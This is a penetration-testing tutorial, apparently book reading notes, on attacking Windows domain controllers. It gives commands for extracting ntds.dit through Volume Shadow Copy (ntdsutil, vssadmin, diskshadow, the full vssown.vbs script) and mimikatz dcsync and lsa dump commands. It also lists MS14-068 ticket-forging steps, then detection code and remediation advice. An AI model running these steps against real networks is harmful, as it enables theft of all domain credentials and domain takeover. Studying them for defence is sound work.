Foreword
This article continues the reading notes on "Intranet Security Attack and Defense: Penetration Testing Practical Guide". This chapter covers domain controller security: it introduces how the Kerberos domain user privilege escalation vulnerability is used, how the hash values stored in ntds.dit are exported, and how domain controllers are attacked, and it gives effective security recommendations.
In a real network environment, the ultimate goal of an attacker who has penetrated the intranet is to gain control of the domain controller and thereby control the entire domain.
1. Use Volume Shadow Copy Service to extract ntds.dit
In Active Directory, all data is stored in the ntds.dit file
- ntds.dit is a binary file stored on the DC at C:\Windows\NTDS\ntds.dit
- It contains all the information in the domain; by parsing ntds.dit you can export computer accounts and other objects in the domain
- Like the SAM file, it is locked by the system while Windows is running
ntds.dit can be extracted with Volume Shadow Copy Service (VSS) , which is essentially a snapshot technology and is mainly used for backup and recovery (even if the target file is locked)
1. ntdsutil.exe
A command-line tool that provides a management interface for AD; supported on Windows Server 2003/2008/2012
// Create a snapshot
ntdsutil snapshot "activate instance ntds" create quit quit
// Mount the snapshot
ntdsutil snapshot "mount <GUID>" quit quit
// Copy ntds.dit out of the mounted snapshot
copy <path of the mounted snapshot>\Windows\NTDS\ntds.dit c:\tmp\ntds.dit
// Unmount and delete the snapshot
ntdsutil snapshot "unmount <GUID>" "delete <GUID>" quit quit
2. vssadmin
VSS management tool shipped with Windows 7 and Windows Server 2008
// Create a shadow copy of the C: volume
vssadmin create shadow /for=c:
// Copy ntds.dit from the shadow copy (the HarddiskVolumeShadowCopy number comes from the output of the previous command)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\ntds.dit c:\ntds.dit
// Delete the shadow copy
vssadmin delete shadows /for=c: /quiet
3. vssown.vbs
A script developed by Mark Baggett and Tim Tomes that offers functionality similar to vssadmin through WMI (Win32_ShadowCopy).
The script is as follows:
REM Volume Shadow Copy Management from CLI.
REM Part of the presentation "Lurking in the Shadows" by Mark Baggett and Tim "LaNMaSteR53" Tomes.
REM Co-developed by Mark Baggett (@MarkBaggett) and Tim Tomes (@lanmaster53).

Set args = WScript.Arguments

if args.Count < 1 Then
  wscript.Echo "Usage: cscript vssown.vbs [option]"
  wscript.Echo
  wscript.Echo "  Options:"
  wscript.Echo
  wscript.Echo "  /list                                - List current volume shadow copies."
  wscript.Echo "  /start                               - Start the shadow copy service."
  wscript.Echo "  /stop                                - Halt the shadow copy service."
  wscript.Echo "  /status                              - Show status of shadow copy service."
  wscript.Echo "  /mode                                - Display the shadow copy service start mode."
  wscript.Echo "  /mode [Manual|Automatic|Disabled]    - Change the shadow copy service start mode."
  wscript.Echo "  /create [drive_letter]               - Create a shadow copy."
  wscript.Echo "  /delete [id|*]                       - Delete a specified or all shadow copies."
  wscript.Echo "  /mount [path] [device_object]        - Mount a shadow copy to the given path."
  wscript.Echo "  /execute [\path\to\file]             - Launch executable from within an unmounted shadow copy."
  wscript.Echo "  /store                               - Display storage statistics."
  wscript.Echo "  /size [bytes]                        - Set drive space reserved for shadow copies."
  REM build_off
  wscript.Echo "  /build [filename]                    - Print pasteable script to stdout."
  REM build_on
  wscript.Quit(0)
End If

strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

Select Case args.Item(0)
  Case "/list"
    Wscript.Echo "SHADOW COPIES"
    Wscript.Echo "============="
    Wscript.Echo
    Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowCopy")
    For Each objItem in colItems
      Wscript.Echo "[*] ID:                  " & objItem.ID
      Wscript.Echo "[*] Client accessible:   " & objItem.ClientAccessible
      Wscript.Echo "[*] Count:               " & objItem.Count
      Wscript.Echo "[*] Device object:       " & objItem.DeviceObject
      Wscript.Echo "[*] Differential:        " & objItem.Differential
      Wscript.Echo "[*] Exposed locally:     " & objItem.ExposedLocally
      Wscript.Echo "[*] Exposed name:        " & objItem.ExposedName
      Wscript.Echo "[*] Exposed remotely:    " & objItem.ExposedRemotely
      Wscript.Echo "[*] Hardware assisted:   " & objItem.HardwareAssisted
      Wscript.Echo "[*] Imported:            " & objItem.Imported
      Wscript.Echo "[*] No auto release:     " & objItem.NoAutoRelease
      Wscript.Echo "[*] Not surfaced:        " & objItem.NotSurfaced
      Wscript.Echo "[*] No writers:          " & objItem.NoWriters
      Wscript.Echo "[*] Originating machine: " & objItem.OriginatingMachine
      Wscript.Echo "[*] Persistent:          " & objItem.Persistent
      Wscript.Echo "[*] Plex:                " & objItem.Plex
      Wscript.Echo "[*] Provider ID:         " & objItem.ProviderID
      Wscript.Echo "[*] Service machine:     " & objItem.ServiceMachine
      Wscript.Echo "[*] Set ID:              " & objItem.SetID
      Wscript.Echo "[*] State:               " & objItem.State
      Wscript.Echo "[*] Transportable:       " & objItem.Transportable
      Wscript.Echo "[*] Volume name:         " & objItem.VolumeName
      Wscript.Echo
    Next
    wscript.Quit(0)

  Case "/start"
    Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
    For Each objService in colListOfServices
      objService.StartService()
      Wscript.Echo "[*] Signal sent to start the " & objService.Name & " service."
    Next
    wscript.Quit(0)

  Case "/stop"
    Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
    For Each objService in colListOfServices
      objService.StopService()
      Wscript.Echo "[*] Signal sent to stop the " & objService.Name & " service."
    Next
    wscript.Quit(0)

  Case "/status"
    Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
    For Each objService in colListOfServices
      Wscript.Echo "[*] " & objService.State
    Next
    wscript.Quit(0)

  Case "/mode"
    Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
    For Each objService in colListOfServices
      if args.Count < 2 Then
        Wscript.Echo "[*] " & objService.Name & " service set to '" & objService.StartMode & "' start mode."
      Else
        mode = LCase(args.Item(1))
        if mode = "manual" or mode = "automatic" or mode = "disabled" Then
          errResult = objService.ChangeStartMode(mode)
          Wscript.Echo "[*] " & objService.Name & " service set to '" & mode & "' start mode."
        Else
          Wscript.Echo "[*] '" & mode & "' is not a valid start mode."
        End If
      End If
    Next
    wscript.Quit(errResult)

  Case "/create"
    VOLUME = args.Item(1) & ":\"
    Const CONTEXT = "ClientAccessible"
    Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
    Wscript.Echo "[*] Attempting to create a shadow copy."
    errResult = objShadowStorage.Create(VOLUME, CONTEXT, strShadowID)
    wscript.Quit(errResult)

  Case "/delete"
    id = args.Item(1)
    Set colItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy")
    For Each objItem in colItems
      if objItem.ID = id Then
        Wscript.Echo "[*] Attempting to delete shadow copy with ID: " & id
        errResult = objItem.Delete_
      ElseIf id = "*" Then
        Wscript.Echo "[*] Attempting to delete shadow copy " & objItem.DeviceObject & "."
        errResult = objItem.Delete_
      End If
    Next
    wscript.Quit(errResult)

  Case "/mount"
    Set WshShell = WScript.CreateObject("WScript.Shell")
    link = args.Item(1)
    sc = args.Item(2) & "\"
    cmd = "cmd /C mklink /D " & link & " " & sc
    WshShell.Run cmd, 2, true
    Wscript.Echo "[*] " & sc & " has been mounted to " & link & "."
    wscript.Quit(0)

  Case "/execute"
    file = args.Item(1)
    Set colItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy")
    Set objProcess = objWMIService.Get("Win32_Process")
    For Each objItem in colItems
      path = Replace(objItem.DeviceObject,"?",".") & file
      intReturn = objProcess.Create(path)
      if intReturn <> 0 Then
        wscript.Echo "[*] Process could not be created from " & path & "."
        wscript.Echo "[*] ReturnValue = " & intReturn
      Else
        wscript.Echo "[!] Process created from " & path & "."
        wscript.Quit(0)
      End If
    Next
    wscript.Quit(0)

  Case "/store"
    Wscript.Echo "SHADOW STORAGE"
    Wscript.Echo "=============="
    Wscript.Echo
    Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowStorage")
    For Each objItem in colItems
      Wscript.Echo "[*] Allocated space: " & FormatNumber(objItem.AllocatedSpace / 1000000,0) & "MB"
      Wscript.Echo "[*] Maximum size:    " & FormatNumber(objItem.MaxSpace / 1000000,0) & "MB"
      Wscript.Echo "[*] Used space:      " & FormatNumber(objItem.UsedSpace / 1000000,0) & "MB"
      Wscript.Echo
    Next
    wscript.Quit(0)

  Case "/size"
    storagesize = CDbl(args.Item(1))
    Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowStorage")
    For Each objItem in colItems
      objItem.MaxSpace = storagesize
      objItem.Put_
    Next
    Wscript.Echo "[*] Shadow storage space has been set to " & FormatNumber(storagesize / 1000000,0) & "MB."
    wscript.Quit(0)

  REM build_off
  Case "/build"
    build = 1
    Const ForReading = 1
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objTextFile = objFSO.OpenTextFile("vssown.vbs", ForReading)
    Do Until objTextFile.AtEndOfStream
      strNextLine = objTextFile.Readline
      if InStr(strNextLine,"REM build_off") = 3 Then
        build = 0
      End If
      if strNextLine <> "" and build = 1 Then
        strNextLine = Replace(strNextLine,"&","^&")
        strNextLine = Replace(strNextLine,">","^>")
        strNextLine = Replace(strNextLine,"<","^<")
        wscript.Echo "echo " & strNextLine & " >> " & args.Item(1)
      End If
      if InStr(strNextLine,"REM build_on") = 3 Then
        build = 1
      End If
    Loop
    wscript.Quit(0)
  REM build_on
End Select
4. IFM of ntdsutil
When ntdsutil creates an IFM (Install From Media) set, it generates a snapshot, mounts it, and copies ntds.dit together with the computer's registry hives to the target folder:
ntdsutil "ac i ntds" "ifm" "create full c:\test" q q
ntds.dit then ends up in c:\test\Active Directory\
and the SYSTEM and SECURITY hives in c:\test\registry\
The Copy-VSS.ps1 script in Nishang implements this whole process.
5. diskshadow
diskshadow.exe can drive VSS and be used to export ntds.dit:
- Produced by Microsoft, and the binary is signed by Microsoft
- Ships by default with Windows Server 2008, 2012 and 2016
- When exporting ntds.dit, it must be run from the C:\Windows\system32 directory
After exporting ntds.dit, dump the SYSTEM hive with reg as well: the key that protects ntds.dit is stored in the SYSTEM hive, so the contents of ntds.dit cannot be read without it.
In a penetration test the text file containing the commands to execute is first written to the remote target system, and diskshadow.exe is then run against that file, which is more flexible. The script contents are as follows:
// Set the shadow copy context
set context persistent nowriters
// Add the volume
add volume c: alias someAlias
// Create the snapshot
create
// Expose the snapshot as a virtual drive letter
expose %someAlias% k:
// Copy ntds.dit
exec "cmd.exe" /c copy k:\Windows\NTDS\ntds.dit c:\ntds.dit
// List the shadow copies
list shadows all
// Reset
reset
// Exit
exit
6. Prevention
By monitoring the use of the Volume Shadow Copy service, malicious operations performed by an attacker on the system can be discovered in time:
- Monitor the Volume Shadow Copy service and any suspicious activity involving the Active Directory database file (ntds.dit)
- Monitor for suspicious instances of System event ID 7036 (a sign that the Volume Shadow Copy service has entered the running state) and events that create the vssvc.exe process
- Monitor events that create diskshadow.exe and its child processes
- Monitor diskshadow.exe process creation on client devices (unless there is a business need, diskshadow.exe should not appear on Windows client systems)
- Monitor newly appearing logical drive mapping events in the logs
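To make the monitoring points above concrete, here is an added example (not from the book or any of the tools it names) that evaluates them over constructed event records; the event field names, the host "role" lookup and the rule names are assumptions of this example rather than a specific SIEM schema.

```python
import re

# Constructed sample events (not real logs). Fields are a minimal normalised form of the
# System log (7036, service state change) and Security log (4688, process creation) records;
# "role" stands in for an asset-inventory lookup and is an assumption of this example.
EVENTS = [
    {"id": 7036, "host": "DC01", "role": "dc",
     "message": "The Volume Shadow Copy service entered the running state."},
    {"id": 4688, "host": "DC01", "role": "dc", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\diskshadow.exe", "cmdline": r"diskshadow.exe /s c:\cmds.txt"},
    {"id": 4688, "host": "DC01", "role": "dc", "parent": r"C:\Windows\System32\diskshadow.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c copy k:\Windows\NTDS\ntds.dit c:\ntds.dit"},
    {"id": 4688, "host": "WS07", "role": "workstation", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\diskshadow.exe", "cmdline": "diskshadow.exe"},
    {"id": 4688, "host": "WS07", "role": "workstation", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

# Binaries that drive VSS; vssvc.exe is the service process itself.
SHADOW_TOOLS = {"diskshadow.exe", "vssadmin.exe", "ntdsutil.exe", "vssvc.exe"}
NTDS_DIT = re.compile(r"\\ntds\\ntds\.dit\b", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the names of the rules from the prevention list that this single event matches."""
    hits = []
    if event["id"] == 7036:
        msg = event.get("message", "").lower()
        if "volume shadow copy" in msg and "running" in msg:
            hits.append("vss_entered_running")
    elif event["id"] == 4688:
        image, parent = basename(event["image"]), basename(event["parent"])
        if image in SHADOW_TOOLS:
            hits.append("shadow_tool_started")
            if image == "diskshadow.exe" and event["role"] != "dc":
                hits.append("diskshadow_on_client")  # should not appear on workstations
        if parent == "diskshadow.exe":
            hits.append("diskshadow_child_process")
        if NTDS_DIT.search(event.get("cmdline", "")):
            hits.append("ntds_dit_referenced")
    return hits


def triage(events):
    """Group rule hits per host: a DC showing VSS start, a shadow tool and an ntds.dit
    reference together is far more suspicious than any one of these on its own."""
    per_host = {}
    for event in events:
        for rule in evaluate(event):
            per_host.setdefault(event["host"], set()).add(rule)
    return per_host
```

Running triage over the sample gives a DC with four correlated hits and a workstation flagged only for running diskshadow.exe, which is how an analyst would prioritise the two.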
2. Export the hash value in ntds.dit
Several tools can be used for this:
- https://github.com/libyal/libesedb
- https://github.com/csababarta/ntdsxtract
- https://github.com/zcgonvh/NTDSDumpEx
3. Use dcsync to get the domain hash value
mimikatz has a dcsync function that can use the Volume Shadow Copy Service (VSS) to read ntds.dit directly and retrieve the domain hash values; it requires domain administrator privileges.
// Export all user names and hash values in the domain
lsadump::dcsync /domain:test.com /all /csv
// Export the hash value of the specified user Dm
lsadump::dcsync /domain:test.com /user:Dm
// Dump hash values from the lsass.exe process
privilege::debug
lsadump::lsa /inject
The output of the mimikatz commands is too long to display in full. You can run the log command first; a text file recording all of mimikatz's output is then written to the current directory.
4. Other methods for obtaining the domain hash value
1. Metasploit
use auxiliary/admin/smb/psexec_ntdsgrab
2. vshadow.exe and QuarkPwDump.exe
QuarkPwDump can quickly, safely and comprehensively read all domain accounts and domain hashes.
Download address: https://github.com/quarkslab/quarkspwdump
5. Kerberos domain user privilege escalation vulnerability
Kerberos Domain User Elevation of Privilege Vulnerability (MS14-068, CVE-2014-6324, KB3011780)
- Windows Server 2012 R2 and earlier versions are affected
- If an attacker obtains shell access to any computer in the domain and also knows the username, SID and password of any domain user, they can obtain domain administrator privileges, then control the DC, and finally take over the domain.
The general process of ticket injection:
- Check whether the patch is installed on the DC (systeminfo, wmic qfe)
- View the user's SID (whoami /user)
- Generate a high-privilege ticket (ms14-068.exe)
- Check permissions before injection (dir \\DC\c$)
- Clear all tickets in memory (mimikatz kerberos::purge)
- Inject the high-privilege ticket into memory (kerberos::ptc)
- Verify permissions
Some tools:
- PyKEK: https://github.com/mubix/pykek
- goldenPac.py in impacket
- ms14_068_kerberos_checksum in Metasploit
Remediation suggestions:
- Turn on Windows Update
- Apply the patch manually
- Control the accounts within the domain
- Forbid weak passwords
- Change passwords regularly and promptly
- Install anti-virus software and keep its signature database up to date
Epilogue
This chapter revolves mainly around obtaining ntds.dit.